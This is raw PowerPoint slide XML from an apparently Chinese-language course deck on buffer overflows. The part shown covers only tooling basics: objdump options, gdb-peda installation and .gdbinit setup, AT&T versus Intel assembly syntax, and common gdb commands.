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81" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="276" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="262" r:id="rId8"/>
    <p:sldId id="263" r:id="rId9"/>
    <p:sldId id="267" r:id="rId10"/>
    <p:sldId id="264" r:id="rId11"/>
    <p:sldId id="260" r:id="rId12"/>
    <p:sldId id="279" r:id="rId13"/>
    <p:sldId id="275" r:id="rId14"/>
    <p:sldId id="278" r:id="rId15"/>
    <p:sldId id="277" r:id="rId16"/>
    <p:sldId id="258" r:id="rId17"/>
    <p:sldId id="265" r:id="rId18"/>
    <p:sldId id="273" r:id="rId19"/>
    <p:sldId id="274" r:id="rId20"/>
    <p:sldId id="266" r:id="rId21"/>
    <p:sldId id="268" r:id="rId22"/>
    <p:sldId id="269" r:id="rId23"/>
    <p:sldId id="270" r:id="rId24"/>
    <p:sldId id="271" r:id="rId25"/>
    <p:sldId id="272" r:id="rId26"/>
    <p:sldId id="282" r:id="rId27"/>
    <p:sldId id="409" r:id="rId28"/>
    <p:sldId id="280" r:id="rId29"/>
    <p:sldId id="283" r:id="rId30"/>
    <p:sldId id="374" r:id="rId31"/>
    <p:sldId id="376" r:id="rId32"/>
    <p:sldId id="377" r:id="rId33"/>
    <p:sldId id="424" r:id="rId34"/>
    <p:sldId id="379" r:id="rId35"/>
    <p:sldId id="380" r:id="rId36"/>
    <p:sldId id="378" r:id="rId37"/>
    <p:sldId id="381" r:id="rId38"/>
    <p:sldId id="384" r:id="rId39"/>
    <p:sldId id="383" r:id="rId40"/>
    <p:sldId id="385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425" r:id="rId52"/>
    <p:sldId id="427" r:id="rId53"/>
    <p:sldId id="396" r:id="rId54"/>
    <p:sldId id="397" r:id="rId55"/>
    <p:sldId id="399" r:id="rId56"/>
    <p:sldId id="400" r:id="rId57"/>
    <p:sldId id="401" r:id="rId58"/>
    <p:sldId id="402" r:id="rId59"/>
    <p:sldId id="403" r:id="rId60"/>
    <p:sldId id="404" r:id="rId61"/>
    <p:sldId id="405" r:id="rId62"/>
    <p:sldId id="406" r:id="rId63"/>
    <p:sldId id="407" r:id="rId64"/>
    <p:sldId id="408" r:id="rId65"/>
    <p:sldId id="428" r:id="rId66"/>
    <p:sldId id="426" r:id="rId67"/>
    <p:sldId id="382" r:id="rId68"/>
    <p:sldId id="412" r:id="rId69"/>
    <p:sldId id="413" r:id="rId70"/>
    <p:sldId id="416" r:id="rId71"/>
    <p:sldId id="417" r:id="rId72"/>
    <p:sldId id="418" r:id="rId73"/>
    <p:sldId id="419" r:id="rId74"/>
    <p:sldId id="420" r:id="rId75"/>
    <p:sldId id="410" r:id="rId76"/>
    <p:sldId id="421" r:id="rId77"/>
    <p:sldId id="411" r:id="rId78"/>
    <p:sldId id="422" r:id="rId79"/>
    <p:sldId id="423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0"/>
    <p:restoredTop sz="94645"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="91" d="100"/>
          <a:sy n="91" d="100"/>
        </p:scale>
        <p:origin x="64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64C3D8-B4AD-C543-8451-805CD393115F}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2019/1/8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07ACF-D10A-7047-A74F-B2CF9D0EFB2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761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88947-A864-428F-B3FA-AA6B6215F45E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8714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88947-A864-428F-B3FA-AA6B6215F45E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1838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88947-A864-428F-B3FA-AA6B6215F45E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1735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88947-A864-428F-B3FA-AA6B6215F45E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5542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698" y="4732865"/>
            <a:ext cx="1002132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634" y="932112"/>
            <a:ext cx="8228087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698" y="5299603"/>
            <a:ext cx="1002132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BCC73-9C6F-417A-B113-7479E2FEF80E}" type="datetime1">
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:t>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7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  <p:sldLayoutId id="214748366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longld/peda.gi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B3C583-45D9-7444-81D2-8E684EB54C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Buffer Overflow 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DC4A50-0F11-DF44-AE0C-51A246933E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416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0CEB48-FAF5-514B-B665-301154B5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Objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> 其他參數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8948EE-C5CF-114A-98DD-ECD00D42F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4287"/>
            <a:ext cx="8596668" cy="3880773"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1"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55410C3-A8C0-3E4D-B5B6-FABCE1B63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66522"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1128910" y="1732013"/>
          <a:ext cx="6291300" cy="3881434"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2097100">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1994274213"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2097100">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2603894072"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2097100">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3717154937"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="267685">
                <a:tc gridSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1300">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>語法：</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>objdump &lt;option(s)&gt; &lt;file(s)&gt;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58538"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="267685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300">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>參數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300">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>範例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300">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>說明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638032"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="468449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-i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objdump –i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300">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>顯示支援的檔案格式與機器架構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863017"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="468449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-f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objdump -f a.o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300">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>顯示檔頭資訊 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1300">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>(-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>file-headers)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994332"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="468449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-h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>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>objdump</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> -h </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>a.o</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1300" dirty="0">
                        <a:effectLst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300">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>顯示區段表頭 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1300">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>(-[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>section-]header)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898971"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="468449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-x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>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>objdump</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> -x </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>a.o</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1300" dirty="0">
                        <a:effectLst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300">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>顯示所有表頭 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1300">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>(-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>all-headers)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863895"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="468449"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effectLst/>
                        </a:rPr>
                        <a:t>-d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objdump -d a.o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300">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>反組譯程式段 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1300">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>(-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>disassemble)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753427"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="468449"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effectLst/>
                        </a:rPr>
                        <a:t>-D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objdump -D a.o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300">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>反組譯全部區段 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1300">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>(-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>disassemble-all)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607221"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="267685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-t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objdump -t a.o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300">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>顯示符號表 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1300">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>(-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>syms)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736388"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="267685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-r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>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>objdump</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> -r </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>a.o</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1300" dirty="0">
                        <a:effectLst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300" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>顯示重定位記錄 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1300" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>(-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>reloc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>)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26600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11CF80F6-8858-684C-A001-16DEDC095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4475" y="239011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315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B3C583-45D9-7444-81D2-8E684EB54C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GDB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DC4A50-0F11-DF44-AE0C-51A246933E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1138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AE77DE-271A-B246-A96A-4C20C662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先把</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>升級成</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>gdb-peda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0E38E4-6D88-0A4A-9DA9-9DB199A5C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git clone </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/longld/peda.git</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"source ~/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>peda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/peda.py" &gt;&gt; ~/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>gdbinit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9C5E03-110E-9543-B5CE-3CA57AFE7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237370"/>
            <a:ext cx="56134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07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環境設置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GDB</a:t>
            </a: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寫設定檔，讓組語印出來時，用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Intel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格式呈現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預設是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AT&amp;T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格式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13</a:t>
            </a:fld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1360B9F-D650-824B-96FD-32BFD386A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528818"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1153852" y="4978174"/>
          <a:ext cx="8596311" cy="1063188"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2865437">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4051759627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3928874319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2655897344"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="400327">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1700" b="0">
                          <a:solidFill>
                            <a:srgbClr val="4F4F4F"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>AT&amp;T</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="71487" marR="71487" marT="71487" marB="7148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700" b="0">
                          <a:solidFill>
                            <a:srgbClr val="4F4F4F"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Intel</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="71487" marR="71487" marT="71487" marB="7148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TW" altLang="en-US" sz="1700" b="0">
                          <a:solidFill>
                            <a:srgbClr val="4F4F4F"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>说明</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="71487" marR="71487" marT="71487" marB="7148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807078"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="657680">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1700" b="0">
                          <a:solidFill>
                            <a:srgbClr val="4F4F4F"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>movl %eax, %ebx</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="71487" marR="71487" marT="71487" marB="7148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700" b="0">
                          <a:solidFill>
                            <a:srgbClr val="4F4F4F"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>mov ebx, eax</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="71487" marR="71487" marT="71487" marB="7148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700" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4F4F4F"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Intel</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1700" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4F4F4F"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>的目的操作数在前</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4F4F4F"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1700" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4F4F4F"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>源操作数在后</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="71487" marR="71487" marT="71487" marB="7148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571845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E06A179-C974-EE47-ADAD-19EED99EA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307714"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1153851" y="3943877"/>
          <a:ext cx="8596311" cy="804108"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2865437">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2907661102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2387955340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3841334460"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="400327">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1700" b="0">
                          <a:solidFill>
                            <a:srgbClr val="4F4F4F"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>AT&amp;T</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="71487" marR="71487" marT="71487" marB="7148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700" b="0">
                          <a:solidFill>
                            <a:srgbClr val="4F4F4F"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Intel</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="71487" marR="71487" marT="71487" marB="7148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TW" altLang="en-US" sz="1700" b="0">
                          <a:solidFill>
                            <a:srgbClr val="4F4F4F"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>说明</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="71487" marR="71487" marT="71487" marB="7148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861"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="400327">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1700" b="0">
                          <a:solidFill>
                            <a:srgbClr val="4F4F4F"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>%eax</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="71487" marR="71487" marT="71487" marB="7148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700" b="0">
                          <a:solidFill>
                            <a:srgbClr val="4F4F4F"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="71487" marR="71487" marT="71487" marB="7148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700" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4F4F4F"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Intel</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1700" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4F4F4F"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>的不带百分号</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="71487" marR="71487" marT="71487" marB="7148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402846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A53EAB3D-FD16-C44B-ABC4-0C279153B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3851" y="3943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268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171547" y="4072455"/>
            <a:ext cx="10021321" cy="493712"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p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echo "set disassembly-flavor intel" &gt;&gt; ~/.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gdbinit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14</a:t>
            </a:fld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5DEEC16-E1D8-C648-A4D6-94A3D95C1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98" y="1236772"/>
            <a:ext cx="91059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24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397016" y="5205614"/>
            <a:ext cx="10021321" cy="493712"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p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gdb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–q</a:t>
            </a:r>
          </a:p>
          <a:p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show disassembly-flavor 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15</a:t>
            </a:fld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F0717E3-989B-5B4D-8C23-46A24499F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98" y="240778"/>
            <a:ext cx="90932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37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786AE7-088B-064F-9B5D-51E55F1A8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gdb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(GNU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Debugger)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01CB05A-F8AF-B54B-936E-53F83DA10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84182"/>
            <a:ext cx="8596668" cy="5320161"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4051116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0CEB48-FAF5-514B-B665-301154B5E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3487"/>
            <a:ext cx="8596668" cy="1320800"/>
          </a:xfrm>
        </p:spPr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gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>常用指令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8948EE-C5CF-114A-98DD-ECD00D42F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4287"/>
            <a:ext cx="8596668" cy="3880773"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1"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55410C3-A8C0-3E4D-B5B6-FABCE1B63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430529"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="677334" y="981902"/>
          <a:ext cx="10062234" cy="6018206"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3354078">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1994274213"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3354078">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2603894072"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3354078">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3717154937"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="361379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>
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>參數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>
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>範例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>
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>說明</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" alt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638032"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="455415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>
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>r</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2000">
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t> 或是 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2000">
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>run</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2000">
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r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>
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>run</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="20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>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>執行</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>程式</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" alt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863017"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="657699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>
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>break</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="200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zh-CN" altLang="en-US" sz="2000">
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>或是</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="200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TW" sz="2000">
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>b</a:t>
                      </a:r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>
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>break</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="20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TW" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>main</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>break</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t> *</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>0x</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
